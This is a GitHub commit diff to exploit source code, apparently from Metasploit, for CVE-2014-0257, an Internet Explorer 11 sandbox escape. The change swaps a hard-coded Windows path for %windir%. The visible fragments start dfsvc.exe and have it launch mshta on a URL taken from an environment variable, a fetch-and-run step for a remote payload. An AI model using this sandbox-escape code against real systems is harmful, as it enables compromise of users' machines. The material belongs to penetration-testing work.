Skip to content

Commit c1368db

Browse files
jvazquez-r7jvazquez-r7
committed
Use %windir%
1 parent 75777cb commit c1368db

File tree

1 file changed

+4
-4
lines changed

1 file changed

+4
-4
lines changed

external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -90,11 +90,11 @@ template<typename T> T ExecuteMethod(mscorlib::_MethodInfoPtr method, std::vecto
9090
return retObj;
9191
}
9292

93-
bstr_t GetExploitUrl()
93+
bstr_t GetEnv(LPWSTR env)
9494
{
9595
WCHAR buf[MAX_ENV];
9696

97-
GetEnvironmentVariable(L"MYURL", buf, MAX_ENV);
97+
GetEnvironmentVariable(env, buf, MAX_ENV);
9898

9999
return buf;
100100
}
@@ -119,7 +119,7 @@ void DoDfsvcExploit()
119119
PROCESS_INFORMATION procInfo = { 0 };
120120

121121
// Start dfsvc (because we can due to the ElevationPolicy)
122-
if (CreateProcess(L"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline,
122+
if (CreateProcess(GetEnv(L"windir") + L"\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline,
123123
nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo))
124124
{
125125
CloseHandle(procInfo.hProcess);
@@ -166,7 +166,7 @@ void DoDfsvcExploit()
166166
std::vector<variant_t> startArgs;
167167

168168
startArgs.push_back(L"mshta");
169-
startArgs.push_back(GetExploitUrl());
169+
startArgs.push_back(GetEnv(L"MYURL"));
170170

171171
ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs);
172172
}

0 commit comments

Comments
 (0)